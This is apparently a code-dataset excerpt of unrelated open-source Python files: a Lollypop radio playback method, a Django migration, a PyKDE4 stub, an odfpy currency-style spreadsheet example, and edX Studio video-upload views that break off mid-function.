    def __on_entry_parsed(self, parser, uri, metadata, track):
        """
            Play the stream URI extracted from the playlist entry
            @param parser as TotemPlParser.Parser
            @param uri as str
            @param metadata as GLib.HashTable
            @param track as Track
        """
        # Only start playing if this is still the pending load request
        # (__current is cleared once playback starts)
        if self.__current == track:
            # Point the track at the resolved stream URI, keeping its name
            track.set_radio(track.album_artists[0], uri)
            self.__start_playback(track)
|
kerimlcr/ab2017-dpyo
|
ornek/lollypop/lollypop-0.9.229/src/player_radio.py
|
Python
|
gpl-3.0
| 5,135
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Create the Place, Waiter and Restaurant demo models.

    Restaurant uses its OneToOneField to Place as primary key, and the
    Waiter -> Restaurant ForeignKey is added in a separate AddField
    operation because Restaurant is created after Waiter.
    """

    dependencies = [
        ('demo_models', '0002_bar_foos'),
    ]

    operations = [
        migrations.CreateModel(
            name='Place',
            fields=[
                ('id', models.AutoField(primary_key=True, auto_created=True, verbose_name='ID', serialize=False)),
                ('name', models.CharField(max_length=50)),
                ('address', models.CharField(max_length=80)),
            ],
        ),
        migrations.CreateModel(
            name='Waiter',
            fields=[
                ('id', models.AutoField(primary_key=True, auto_created=True, verbose_name='ID', serialize=False)),
                ('name', models.CharField(max_length=50)),
            ],
        ),
        migrations.CreateModel(
            name='Restaurant',
            fields=[
                # The one-to-one link to Place doubles as the primary key
                ('place', models.OneToOneField(primary_key=True, to='demo_models.Place', serialize=False)),
                ('serves_hot_dogs', models.BooleanField(default=False)),
                ('serves_pizza', models.BooleanField(default=False)),
            ],
        ),
        migrations.AddField(
            model_name='waiter',
            name='restaurant',
            field=models.ForeignKey(to='demo_models.Restaurant'),
        ),
    ]
|
AbhiAgarwal/django-report-builder
|
report_builder_demo/demo_models/migrations/0003_auto_20150419_2110.py
|
Python
|
bsd-3-clause
| 1,395
|
# encoding: utf-8
# module PyKDE4.kio
# from /usr/lib/python3/dist-packages/PyKDE4/kio.cpython-34m-x86_64-linux-gnu.so
# by generator 1.135
# no doc
# imports
import PyKDE4.kdeui as __PyKDE4_kdeui
import PyQt4.QtCore as __PyQt4_QtCore
import PyQt4.QtGui as __PyQt4_QtGui
class KMimeTypeChooserDialog(__PyKDE4_kdeui.KDialog):
    """Auto-generated IDE stub for PyKDE4's KMimeTypeChooserDialog.

    Generated from the compiled extension module, so real signatures are
    unknown; methods are no-op placeholders for introspection only.
    """

    def chooser(self, *args, **kwargs):  # real signature unknown
        # Stub only; the actual implementation lives in the C++ extension.
        pass

    def __init__(self, *args, **kwargs):  # real signature unknown
        pass
|
ProfessorX/Config
|
.PyCharm30/system/python_stubs/-1247971765/PyKDE4/kio/KMimeTypeChooserDialog.py
|
Python
|
gpl-2.0
| 501
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2009 Brad Ralph, Sydney, Australia
#
# This is free software. You may redistribute it under the terms
# of the Apache license and the GNU General Public License Version
# 2 or at your option any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Contributor(s):
# Søren Roug
# This example shows how to do a conditional currency style. We want negative
# numbers to show as red and as Australian dollars.
from odf.opendocument import OpenDocumentSpreadsheet
from odf.style import Style, TextProperties, TableColumnProperties, Map
from odf.number import NumberStyle, CurrencyStyle, CurrencySymbol, Number, Text
from odf.text import P
from odf.table import Table, TableColumn, TableRow, TableCell
textdoc = OpenDocumentSpreadsheet()

# Create a style for the table content. One we can modify
# later in the spreadsheet.
tablecontents = Style(name="Large number", family="table-cell")
tablecontents.addElement(TextProperties(fontfamily="Arial", fontsize="15pt"))
textdoc.styles.addElement(tablecontents)

# Create automatic styles for the column widths.
widewidth = Style(name="co1", family="table-column")
widewidth.addElement(TableColumnProperties(columnwidth="2.8cm", breakbefore="auto"))
textdoc.automaticstyles.addElement(widewidth)

# Create the styles for $AUD format currency values.
# The "positive" style is volatile: it is never applied directly, only
# referenced from the Map condition of the main style below.
ns1 = CurrencyStyle(name="positive-AUD", volatile="true")
ns1.addElement(CurrencySymbol(language="en", country="AU", text=u"$"))
ns1.addElement(Number(decimalplaces="2", minintegerdigits="1", grouping="true"))
textdoc.styles.addElement(ns1)

# Create the main style: red text with a leading minus sign for negative
# amounts; values >= 0 are redirected to the positive-AUD style.
ns2 = CurrencyStyle(name="main-AUD")
ns2.addElement(TextProperties(color="#ff0000"))
ns2.addElement(Text(text=u"-"))
ns2.addElement(CurrencySymbol(language="en", country="AU", text=u"$"))
ns2.addElement(Number(decimalplaces="2", minintegerdigits="1", grouping="true"))
ns2.addElement(Map(condition="value()>=0", applystylename="positive-AUD"))
textdoc.styles.addElement(ns2)

# Create automatic style for the price cells.
moneycontents = Style(name="ce1", family="table-cell", parentstylename=tablecontents, datastylename="main-AUD")
textdoc.automaticstyles.addElement(moneycontents)

# Start the table, and describe the columns
table = Table(name="Currency colours")
# Create a column (same as <col> in HTML) Make all cells in column default to currency
table.addElement(TableColumn(stylename=widewidth, defaultcellstylename="ce1"))

# Create a row (same as <tr> in HTML)
tr = TableRow()
table.addElement(tr)
# Create a cell with a negative value. It should show as red.
cell = TableCell(valuetype="currency", currency="AUD", value="-125")
cell.addElement(P(text=u"$-125.00"))  # The current displayed value
tr.addElement(cell)

# Create a row (same as <tr> in HTML)
tr = TableRow()
table.addElement(tr)
# Create another cell but with a positive value. It should show in black
cell = TableCell(valuetype="currency", currency="AUD", value="123")
cell.addElement(P(text=u"$123.00"))  # The current displayed value
tr.addElement(cell)

textdoc.spreadsheet.addElement(table)
textdoc.save("currency.ods")
|
pacoqueen/odfpy
|
examples/ods-currency.py
|
Python
|
gpl-2.0
| 3,626
|
"""
Views related to the video upload feature
"""
import csv
import json
import logging
from contextlib import closing
from datetime import datetime, timedelta
from uuid import uuid4
import rfc6266
from boto import s3
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.contrib.staticfiles.storage import staticfiles_storage
from django.core.files.images import get_image_dimensions
from django.http import HttpResponse, HttpResponseNotFound
from django.utils.translation import ugettext as _
from django.utils.translation import ugettext_noop
from django.views.decorators.http import require_GET, require_http_methods, require_POST
from edxval.api import (
SortDirection,
VideoSortField,
create_or_update_transcript_preferences,
create_video,
get_3rd_party_transcription_plans,
get_transcript_credentials_state_for_org,
get_transcript_preferences,
get_videos_for_course,
remove_transcript_preferences,
remove_video_for_course,
update_video_image,
update_video_status,
get_available_transcript_languages
)
from opaque_keys.edx.keys import CourseKey
from xmodule.video_module.transcripts_utils import Transcript
from contentstore.models import VideoUploadConfig
from contentstore.utils import reverse_course_url
from edxmako.shortcuts import render_to_response
from openedx.core.djangoapps.video_config.models import VideoTranscriptEnabledFlag
from openedx.core.djangoapps.waffle_utils import WaffleSwitchNamespace
from util.json_request import JsonResponse, expect_json
from .course import get_course_and_check_access
__all__ = [
'videos_handler',
'video_encodings_download',
'video_images_handler',
'transcript_preferences_handler',
]
LOGGER = logging.getLogger(__name__)
# Waffle switches namespace for videos
WAFFLE_NAMESPACE = 'videos'
WAFFLE_SWITCHES = WaffleSwitchNamespace(name=WAFFLE_NAMESPACE)
# Waffle switch for enabling/disabling video image upload feature
VIDEO_IMAGE_UPLOAD_ENABLED = 'video_image_upload_enabled'
# Default expiration, in seconds, of one-time URLs used for uploading videos.
KEY_EXPIRATION_IN_SECONDS = 86400
VIDEO_SUPPORTED_FILE_FORMATS = {
'.mp4': 'video/mp4',
'.mov': 'video/quicktime',
}
VIDEO_UPLOAD_MAX_FILE_SIZE_GB = 5
# maximum time for video to remain in upload state
MAX_UPLOAD_HOURS = 24
class TranscriptProvider(object):
    """
    Transcription Provider Enumeration.

    The string values are the provider identifiers used as keys in the
    third-party transcription plans returned by edx-val.
    """
    CIELO24 = 'Cielo24'
    THREE_PLAY_MEDIA = '3PlayMedia'
    CUSTOM = 'Custom'
class StatusDisplayStrings(object):
    """
    A class to map status strings as stored in VAL to display strings for the
    video upload page.

    The `_STATUS_MAP` keys are raw VAL statuses; values are lazily-translated
    display strings (marked with ugettext_noop here, translated in get()).
    """
    # Translators: This is the status of an active video upload
    _UPLOADING = ugettext_noop("Uploading")
    # Translators: This is the status for a video that the servers are currently processing
    _IN_PROGRESS = ugettext_noop("In Progress")
    # Translators: This is the status for a video that the servers have successfully processed
    _COMPLETE = ugettext_noop("Ready")
    # Translators: This is the status for a video that is uploaded completely
    _UPLOAD_COMPLETED = ugettext_noop("Uploaded")
    # Translators: This is the status for a video that the servers have failed to process
    _FAILED = ugettext_noop("Failed")
    # Translators: This is the status for a video that is cancelled during upload by user
    _CANCELLED = ugettext_noop("Cancelled")
    # Translators: This is the status for a video which has failed
    # due to being flagged as a duplicate by an external or internal CMS
    _DUPLICATE = ugettext_noop("Failed Duplicate")
    # Translators: This is the status for a video which has duplicate token for youtube
    _YOUTUBE_DUPLICATE = ugettext_noop("YouTube Duplicate")
    # Translators: This is the status for a video for which an invalid
    # processing token was provided in the course settings
    _INVALID_TOKEN = ugettext_noop("Invalid Token")
    # Translators: This is the status for a video that was included in a course import
    _IMPORTED = ugettext_noop("Imported")
    # Translators: This is the status for a video that is in an unknown state
    _UNKNOWN = ugettext_noop("Unknown")
    # Translators: This is the status for a video that is having its transcription in progress on servers
    _TRANSCRIPTION_IN_PROGRESS = ugettext_noop("Transcription in Progress")
    # Translators: This is the status for a video whose transcription is complete
    _TRANSCRIPT_READY = ugettext_noop("Transcript Ready")

    # Raw VAL status -> untranslated display string
    _STATUS_MAP = {
        "upload": _UPLOADING,
        "ingest": _IN_PROGRESS,
        "transcode_queue": _IN_PROGRESS,
        "transcode_active": _IN_PROGRESS,
        "file_delivered": _COMPLETE,
        "file_complete": _COMPLETE,
        "upload_completed": _UPLOAD_COMPLETED,
        "file_corrupt": _FAILED,
        "pipeline_error": _FAILED,
        "upload_failed": _FAILED,
        "s3_upload_failed": _FAILED,
        "upload_cancelled": _CANCELLED,
        "duplicate": _DUPLICATE,
        "youtube_duplicate": _YOUTUBE_DUPLICATE,
        "invalid_token": _INVALID_TOKEN,
        "imported": _IMPORTED,
        "transcription_in_progress": _TRANSCRIPTION_IN_PROGRESS,
        "transcript_ready": _TRANSCRIPT_READY,
    }

    @staticmethod
    def get(val_status):
        """Map a VAL status string to a localized display string (falls back to "Unknown")"""
        return _(StatusDisplayStrings._STATUS_MAP.get(val_status, StatusDisplayStrings._UNKNOWN))  # pylint: disable=translation-of-non-string
@expect_json
@login_required
@require_http_methods(("GET", "POST", "DELETE"))
def videos_handler(request, course_key_string, edx_video_id=None):
    """
    The restful handler for video uploads.
    GET
        html: return an HTML page to display previous video uploads and allow
            new ones
        json: return json representing the videos that have been uploaded and
            their statuses
    POST
        json: create a new video upload; the actual files should not be provided
            to this endpoint but rather PUT to the respective upload_url values
            contained in the response
    DELETE
        soft deletes a video for particular course
    """
    # 404 unless the course exists, the user has access to it, and the
    # video upload pipeline is configured for it
    course = _get_and_validate_course(course_key_string, request.user)
    if not course:
        return HttpResponseNotFound()
    if request.method == "GET":
        if "application/json" in request.META.get("HTTP_ACCEPT", ""):
            return videos_index_json(course)
        else:
            return videos_index_html(course)
    elif request.method == "DELETE":
        remove_video_for_course(course_key_string, edx_video_id)
        return JsonResponse()
    else:
        # POST is either a status-update callback or a request for new
        # upload URLs, distinguished by the payload shape
        if is_status_update_request(request.json):
            return send_video_status_update(request.json)
        return videos_post(course, request)
def validate_video_image(image_file):
    """
    Validates video image file.

    Checks, in order: required attributes, content type, max/min byte size,
    image dimensions and aspect ratio, and finally an ASCII-only file name.
    Arguments:
        image_file: The selected image file (Django UploadedFile-like).
    Returns:
        error (String or None): If there is error returns error message otherwise None.
    """
    error = None
    if not all(hasattr(image_file, attr) for attr in ['name', 'content_type', 'size']):
        error = _('The image must have name, content type, and size information.')
    elif image_file.content_type not in settings.VIDEO_IMAGE_SUPPORTED_FILE_FORMATS.values():
        error = _('This image file type is not supported. Supported file types are {supported_file_formats}.').format(
            supported_file_formats=settings.VIDEO_IMAGE_SUPPORTED_FILE_FORMATS.keys()
        )
    elif image_file.size > settings.VIDEO_IMAGE_SETTINGS['VIDEO_IMAGE_MAX_BYTES']:
        error = _('This image file must be smaller than {image_max_size}.').format(
            image_max_size=settings.VIDEO_IMAGE_MAX_FILE_SIZE_MB
        )
    elif image_file.size < settings.VIDEO_IMAGE_SETTINGS['VIDEO_IMAGE_MIN_BYTES']:
        error = _('This image file must be larger than {image_min_size}.').format(
            image_min_size=settings.VIDEO_IMAGE_MIN_FILE_SIZE_KB
        )
    else:
        try:
            # get_image_dimensions raises TypeError for non-image content
            image_file_width, image_file_height = get_image_dimensions(image_file)
        except TypeError:
            return _('There is a problem with this image file. Try to upload a different file.')
        if image_file_width is None or image_file_height is None:
            return _('There is a problem with this image file. Try to upload a different file.')
        # Deviation of the file's aspect ratio from the configured one
        image_file_aspect_ratio = abs(image_file_width / float(image_file_height) - settings.VIDEO_IMAGE_ASPECT_RATIO)
        if image_file_width < settings.VIDEO_IMAGE_MIN_WIDTH or image_file_height < settings.VIDEO_IMAGE_MIN_HEIGHT:
            error = _('Recommended image resolution is {image_file_max_width}x{image_file_max_height}. '
                      'The minimum resolution is {image_file_min_width}x{image_file_min_height}.').format(
                image_file_max_width=settings.VIDEO_IMAGE_MAX_WIDTH,
                image_file_max_height=settings.VIDEO_IMAGE_MAX_HEIGHT,
                image_file_min_width=settings.VIDEO_IMAGE_MIN_WIDTH,
                image_file_min_height=settings.VIDEO_IMAGE_MIN_HEIGHT
            )
        elif image_file_aspect_ratio > settings.VIDEO_IMAGE_ASPECT_RATIO_ERROR_MARGIN:
            error = _('This image file must have an aspect ratio of {video_image_aspect_ratio_text}.').format(
                video_image_aspect_ratio_text=settings.VIDEO_IMAGE_ASPECT_RATIO_TEXT
            )
        else:
            try:
                # Image file name must be ASCII-encodable
                image_file.name.encode('ascii')
            except UnicodeEncodeError:
                error = _('The image file name can only contain letters, numbers, hyphens (-), and underscores (_).')
    return error
@expect_json
@login_required
@require_POST
def video_images_handler(request, course_key_string, edx_video_id=None):
    """
    Upload a poster image for the given video.

    Expects the image under the `file` key of a multipart POST; validates
    it and stores it via edx-val.
    Returns:
        JSON with the new `image_url`, or a 400 with an `error` message.
    """
    # respond with a 404 if image upload is not enabled.
    if not WAFFLE_SWITCHES.is_enabled(VIDEO_IMAGE_UPLOAD_ENABLED):
        return HttpResponseNotFound()
    if 'file' not in request.FILES:
        return JsonResponse({'error': _(u'An image file is required.')}, status=400)
    image_file = request.FILES['file']
    error = validate_video_image(image_file)
    if error:
        return JsonResponse({'error': error}, status=400)
    # Ensure the uploaded file handle is closed after storing the image
    with closing(image_file):
        image_url = update_video_image(edx_video_id, course_key_string, image_file, image_file.name)
        LOGGER.info(
            'VIDEOS: Video image uploaded for edx_video_id [%s] in course [%s]', edx_video_id, course_key_string
        )
    return JsonResponse({'image_url': image_url})
def validate_transcript_preferences(provider, cielo24_fidelity, cielo24_turnaround,
                                    three_play_turnaround, video_source_language, preferred_languages):
    """
    Validate 3rd Party Transcription Preferences.

    Checks the requested values against the provider's transcription plan
    (fidelity, turnaround, source language and target languages).
    Arguments:
        provider: Transcription provider
        cielo24_fidelity: Cielo24 transcription fidelity.
        cielo24_turnaround: Cielo24 transcription turnaround.
        three_play_turnaround: 3PlayMedia transcription turnaround.
        video_source_language: Source/Speech language of the videos that are going to be submitted to the Providers.
        preferred_languages: list of language codes.
    Returns:
        (error, preferences) tuple: `error` is a message string (or None),
        `preferences` is the validated dict (empty on error).
    """
    error, preferences = None, {}
    # validate transcription providers
    transcription_plans = get_3rd_party_transcription_plans()
    if provider in transcription_plans.keys():
        # Further validations for providers
        if provider == TranscriptProvider.CIELO24:
            # Validate transcription fidelity
            if cielo24_fidelity in transcription_plans[provider]['fidelity']:
                # Validate transcription turnaround
                if cielo24_turnaround not in transcription_plans[provider]['turnaround']:
                    error = 'Invalid cielo24 turnaround {}.'.format(cielo24_turnaround)
                    return error, preferences
                # Validate transcription languages: supported languages
                # depend on the selected fidelity tier
                supported_languages = transcription_plans[provider]['fidelity'][cielo24_fidelity]['languages']
                if video_source_language not in supported_languages:
                    error = 'Unsupported source language {}.'.format(video_source_language)
                    return error, preferences
                # Preferred languages must be non-empty and a subset of the supported ones
                if not len(preferred_languages) or not (set(preferred_languages) <= set(supported_languages.keys())):
                    error = 'Invalid languages {}.'.format(preferred_languages)
                    return error, preferences
                # Validated Cielo24 preferences
                preferences = {
                    'video_source_language': video_source_language,
                    'cielo24_fidelity': cielo24_fidelity,
                    'cielo24_turnaround': cielo24_turnaround,
                    'preferred_languages': preferred_languages,
                }
            else:
                error = 'Invalid cielo24 fidelity {}.'.format(cielo24_fidelity)
        elif provider == TranscriptProvider.THREE_PLAY_MEDIA:
            # Validate transcription turnaround
            if three_play_turnaround not in transcription_plans[provider]['turnaround']:
                error = 'Invalid 3play turnaround {}.'.format(three_play_turnaround)
                return error, preferences
            # Validate transcription languages: valid targets depend on the source language
            valid_translations_map = transcription_plans[provider]['translations']
            if video_source_language not in valid_translations_map.keys():
                error = 'Unsupported source language {}.'.format(video_source_language)
                return error, preferences
            valid_target_languages = valid_translations_map[video_source_language]
            # Preferred languages must be non-empty and a subset of the valid targets
            if not len(preferred_languages) or not (set(preferred_languages) <= set(valid_target_languages)):
                error = 'Invalid languages {}.'.format(preferred_languages)
                return error, preferences
            # Validated 3PlayMedia preferences
            preferences = {
                'three_play_turnaround': three_play_turnaround,
                'video_source_language': video_source_language,
                'preferred_languages': preferred_languages,
            }
    else:
        error = 'Invalid provider {}.'.format(provider)
    return error, preferences
@expect_json
@login_required
@require_http_methods(('POST', 'DELETE'))
def transcript_preferences_handler(request, course_key_string):
    """
    JSON view handler to post or delete the course's transcript preferences.
    Arguments:
        request: WSGI request object
        course_key_string: string for course key
    Returns: valid json response or 400 with error message
    """
    course_key = CourseKey.from_string(course_key_string)
    # 404 unless the video-transcript feature is enabled for this course
    is_video_transcript_enabled = VideoTranscriptEnabledFlag.feature_enabled(course_key)
    if not is_video_transcript_enabled:
        return HttpResponseNotFound()
    if request.method == 'POST':
        data = request.json
        provider = data.get('provider')
        error, preferences = validate_transcript_preferences(
            provider=provider,
            cielo24_fidelity=data.get('cielo24_fidelity', ''),
            cielo24_turnaround=data.get('cielo24_turnaround', ''),
            three_play_turnaround=data.get('three_play_turnaround', ''),
            video_source_language=data.get('video_source_language'),
            preferred_languages=data.get('preferred_languages', [])
        )
        if error:
            response = JsonResponse({'error': error}, status=400)
        else:
            # Persist the validated preferences along with the provider name
            preferences.update({'provider': provider})
            transcript_preferences = create_or_update_transcript_preferences(course_key_string, **preferences)
            response = JsonResponse({'transcript_preferences': transcript_preferences}, status=200)
        return response
    elif request.method == 'DELETE':
        remove_transcript_preferences(course_key_string)
        return JsonResponse()
@login_required
@require_GET
def video_encodings_download(request, course_key_string):
    """
    Returns a CSV report containing the encoded video URLs for video uploads
    in the following format:
    Video ID,Name,Status,Profile1 URL,Profile2 URL
    aaaaaaaa-aaaa-4aaa-aaaa-aaaaaaaaaaaa,video.mp4,Complete,http://example.com/prof1.mp4,http://example.com/prof2.mp4
    """
    course = _get_and_validate_course(course_key_string, request.user)
    if not course:
        return HttpResponseNotFound()

    def get_profile_header(profile):
        """Returns the column header string for the given profile's URLs"""
        # Translators: This is the header for a CSV file column
        # containing URLs for video encodings for the named profile
        # (e.g. desktop, mobile high quality, mobile low quality)
        return _("{profile_name} URL").format(profile_name=profile)

    # Only profiles on the whitelist get a URL column in the report
    profile_whitelist = VideoUploadConfig.get_profile_whitelist()
    videos = list(_get_videos(course))
    name_col = _("Name")
    duration_col = _("Duration")
    added_col = _("Date Added")
    video_id_col = _("Video ID")
    status_col = _("Status")
    profile_cols = [get_profile_header(profile) for profile in profile_whitelist]

    def make_csv_dict(video):
        """
        Makes a dictionary suitable for writing CSV output. This involves
        extracting the required items from the original video dict and
        converting all keys and values to UTF-8 encoded string objects,
        because the CSV module doesn't play well with unicode objects.
        """
        # Translators: This is listed as the duration for a video that has not
        # yet reached the point in its processing by the servers where its
        # duration is determined.
        duration_val = str(video["duration"]) if video["duration"] > 0 else _("Pending")
        ret = dict(
            [
                (name_col, video["client_video_id"]),
                (duration_col, duration_val),
                (added_col, video["created"].isoformat()),
                (video_id_col, video["edx_video_id"]),
                (status_col, video["status"]),
            ] +
            [
                (get_profile_header(encoded_video["profile"]), encoded_video["url"])
                for encoded_video in video["encoded_videos"]
                if encoded_video["profile"] in profile_whitelist
            ]
        )
        # Encode everything to UTF-8 bytes for the Python 2 csv module
        return {
            key.encode("utf-8"): value.encode("utf-8")
            for key, value in ret.items()
        }

    response = HttpResponse(content_type="text/csv")
    # Translators: This is the suggested filename when downloading the URL
    # listing for videos uploaded through Studio
    filename = _("{course}_video_urls").format(course=course.id.course)
    # See https://tools.ietf.org/html/rfc6266#appendix-D
    response["Content-Disposition"] = rfc6266.build_header(
        filename + ".csv",
        filename_compat="video_urls.csv"
    )
    writer = csv.DictWriter(
        response,
        [
            col_name.encode("utf-8")
            for col_name
            in [name_col, duration_col, added_col, video_id_col, status_col] + profile_cols
        ],
        dialect=csv.excel
    )
    writer.writeheader()
    for video in videos:
        writer.writerow(make_csv_dict(video))
    return response
def _get_and_validate_course(course_key_string, user):
    """
    Given a course key, return the course if it exists, the given user has
    access to it, and it is properly configured for video uploads; otherwise
    return None.
    """
    course_key = CourseKey.from_string(course_key_string)
    # For now, assume all studio users that have access to the course can upload videos.
    # In the future, we plan to add a new org-level role for video uploaders.
    course = get_course_and_check_access(course_key, user)
    # The feature flag, pipeline settings, course access and per-course
    # pipeline configuration must all be in place for uploads to work.
    upload_ready = (
        settings.FEATURES["ENABLE_VIDEO_UPLOAD_PIPELINE"]
        and getattr(settings, "VIDEO_UPLOAD_PIPELINE", None)
        and course
        and course.video_pipeline_configured
    )
    return course if upload_ready else None
def convert_video_status(video):
    """
    Convert status of a video. Status can be converted to one of the following:
        * FAILED if video is in `upload` state for more than 24 hours
        * `YouTube Duplicate` if status is `invalid_token`
        * user-friendly video status
    """
    # Use the created timestamp's own tzinfo so aware and naive datetimes
    # never get mixed in the subtraction below
    now = datetime.now(video['created'].tzinfo)
    if video['status'] == 'upload' and (now - video['created']) > timedelta(hours=MAX_UPLOAD_HOURS):
        new_status = 'upload_failed'
        status = StatusDisplayStrings.get(new_status)
        message = 'Video with id [%s] is still in upload after [%s] hours, setting status to [%s]' % (
            video['edx_video_id'], MAX_UPLOAD_HOURS, new_status
        )
        # Persist the failure back to VAL so the stale upload stops
        # appearing as active on subsequent requests
        send_video_status_update([
            {
                'edxVideoId': video['edx_video_id'],
                'status': new_status,
                'message': message
            }
        ])
    elif video['status'] == 'invalid_token':
        status = StatusDisplayStrings.get('youtube_duplicate')
    else:
        status = StatusDisplayStrings.get(video['status'])
    return status
def _get_videos(course):
    """
    Retrieves the list of videos from VAL corresponding to this course,
    sorted by creation date (newest first), with statuses converted to
    display strings and (when enabled) available transcript languages.
    """
    is_video_transcript_enabled = VideoTranscriptEnabledFlag.feature_enabled(course.id)
    videos = list(get_videos_for_course(unicode(course.id), VideoSortField.created, SortDirection.desc))
    # convert VAL's status to studio's Video Upload feature status.
    for video in videos:
        video["status"] = convert_video_status(video)
        if is_video_transcript_enabled:
            video['transcripts'] = get_available_transcript_languages([video['edx_video_id']])
    return videos
def _get_default_video_image_url():
    """
    Returns the static-files URL of the default (placeholder) video image.
    """
    return staticfiles_storage.url(settings.VIDEO_IMAGE_DEFAULT_FILENAME)
def _get_index_videos(course):
    """
    Returns the information about each video upload required for the video list
    """
    course_id = unicode(course.id)
    attrs = ['edx_video_id', 'client_video_id', 'created', 'duration', 'status', 'courses']
    # Include transcript languages only when the feature is enabled
    if VideoTranscriptEnabledFlag.feature_enabled(course.id):
        attrs += ['transcripts']

    def _get_values(video):
        """
        Get data for predefined video attributes.
        """
        values = {}
        for attr in attrs:
            if attr == 'courses':
                # video['courses'] holds per-course dicts; keep only the one
                # matching this course (Python 2 filter returns a list).
                # NOTE(review): this local `course` shadows the outer course
                # object — consider renaming.
                course = filter(lambda c: course_id in c, video['courses'])
                # The matching dict is expected to hold exactly one entry,
                # mapping the course id to the course-specific image URL
                (__, values['course_video_image_url']), = course[0].items()
            else:
                values[attr] = video[attr]
        return values

    return [
        _get_values(video) for video in _get_videos(course)
    ]
def get_all_transcript_languages():
    """
    Returns all possible languages for transcript.

    Combines the system-wide language list with the languages supported by
    the 3rd-party transcription providers (3PlayMedia and every Cielo24
    fidelity tier), sorted by display text.
    """
    transcription_plans = get_3rd_party_transcription_plans()
    cielo_fidelity = transcription_plans[TranscriptProvider.CIELO24]['fidelity']

    # Merge third-party provider languages into a single mapping.
    third_party_transcription_languages = {}
    third_party_transcription_languages.update(transcription_plans[TranscriptProvider.THREE_PLAY_MEDIA]['languages'])
    for fidelity_tier in ('MECHANICAL', 'PREMIUM', 'PROFESSIONAL'):
        third_party_transcription_languages.update(cielo_fidelity[fidelity_tier]['languages'])

    # System settings take lower precedence than provider languages.
    all_languages_dict = dict(settings.ALL_LANGUAGES, **third_party_transcription_languages)

    # Return combined system settings and 3rd party transcript languages,
    # ordered by the human-readable language text.
    return [
        {'language_code': code, 'language_text': text}
        for code, text in sorted(all_languages_dict.iteritems(), key=lambda item: item[1])
    ]
def videos_index_html(course):
    """
    Returns an HTML page to display previous video uploads and allow new ones.

    Builds the template context (upload URLs, limits, image settings) and,
    when video transcripts are enabled for the course, the transcript
    handler URLs, active preferences, credentials state and languages.
    """
    is_video_transcript_enabled = VideoTranscriptEnabledFlag.feature_enabled(course.id)
    context = {
        'context_course': course,
        'image_upload_url': reverse_course_url('video_images_handler', unicode(course.id)),
        'video_handler_url': reverse_course_url('videos_handler', unicode(course.id)),
        'encodings_download_url': reverse_course_url('video_encodings_download', unicode(course.id)),
        'default_video_image_url': _get_default_video_image_url(),
        'previous_uploads': _get_index_videos(course),
        'concurrent_upload_limit': settings.VIDEO_UPLOAD_PIPELINE.get('CONCURRENT_UPLOAD_LIMIT', 0),
        'video_supported_file_formats': VIDEO_SUPPORTED_FILE_FORMATS.keys(),
        'video_upload_max_file_size': VIDEO_UPLOAD_MAX_FILE_SIZE_GB,
        'video_image_settings': {
            'video_image_upload_enabled': WAFFLE_SWITCHES.is_enabled(VIDEO_IMAGE_UPLOAD_ENABLED),
            'max_size': settings.VIDEO_IMAGE_SETTINGS['VIDEO_IMAGE_MAX_BYTES'],
            'min_size': settings.VIDEO_IMAGE_SETTINGS['VIDEO_IMAGE_MIN_BYTES'],
            'max_width': settings.VIDEO_IMAGE_MAX_WIDTH,
            'max_height': settings.VIDEO_IMAGE_MAX_HEIGHT,
            'supported_file_formats': settings.VIDEO_IMAGE_SUPPORTED_FILE_FORMATS
        },
        'is_video_transcript_enabled': is_video_transcript_enabled,
        # Transcript-related entries stay None when the feature is disabled
        'video_transcript_settings': None,
        'active_transcript_preferences': None,
        'transcript_credentials': None,
        'transcript_available_languages': None
    }
    if is_video_transcript_enabled:
        context['video_transcript_settings'] = {
            'transcript_preferences_handler_url': reverse_course_url(
                'transcript_preferences_handler',
                unicode(course.id)
            ),
            'transcript_credentials_handler_url': reverse_course_url(
                'transcript_credentials_handler',
                unicode(course.id)
            ),
            'transcript_download_handler_url': reverse_course_url(
                'transcript_download_handler',
                unicode(course.id)
            ),
            'transcript_upload_handler_url': reverse_course_url(
                'transcript_upload_handler',
                unicode(course.id)
            ),
            'transcript_delete_handler_url': reverse_course_url(
                'transcript_delete_handler',
                unicode(course.id)
            ),
            'transcription_plans': get_3rd_party_transcription_plans(),
            'trancript_download_file_format': Transcript.SRT
        }
        context['active_transcript_preferences'] = get_transcript_preferences(unicode(course.id))
        # Cached state for transcript providers' credentials (org-specific)
        context['transcript_credentials'] = get_transcript_credentials_state_for_org(course.id.org)
        context['transcript_available_languages'] = get_all_transcript_languages()
    return render_to_response('videos_index.html', context)
def videos_index_json(course):
    """
    Returns JSON in the following format:
    {
        'videos': [{
            'edx_video_id': 'aaaaaaaa-aaaa-4aaa-aaaa-aaaaaaaaaaaa',
            'client_video_id': 'video.mp4',
            'created': '1970-01-01T00:00:00Z',
            'duration': 42.5,
            'status': 'upload',
            'course_video_image_url': 'https://video/images/1234.jpg'
        }]
    }
    """
    return JsonResponse({"videos": _get_index_videos(course)}, status=200)
def videos_post(course, request):
    """
    Create pre-signed S3 upload URLs for a batch of videos and register
    each one in VAL with status `upload`.
    Input (JSON):
    {
        "files": [{
            "file_name": "video.mp4",
            "content_type": "video/mp4"
        }]
    }
    Returns (JSON):
    {
        "files": [{
            "file_name": "video.mp4",
            "upload_url": "http://example.com/put_video"
        }]
    }
    The returned array corresponds exactly to the input array.
    Responds with 400 and an `error` message on malformed input.
    """
    error = None
    data = request.json
    # Validate the request shape before touching storage.
    # Note: loop variables renamed from `file` to `upload_file` so they no
    # longer shadow the Python 2 builtin `file`.
    if 'files' not in data:
        error = "Request object is not JSON or does not contain 'files'"
    elif any(
        'file_name' not in upload_file or 'content_type' not in upload_file
        for upload_file in data['files']
    ):
        error = "Request 'files' entry does not contain 'file_name' and 'content_type'"
    elif any(
        upload_file['content_type'] not in VIDEO_SUPPORTED_FILE_FORMATS.values()
        for upload_file in data['files']
    ):
        error = "Request 'files' entry contain unsupported content_type"
    if error:
        return JsonResponse({'error': error}, status=400)

    bucket = storage_service_bucket()
    req_files = data['files']
    resp_files = []

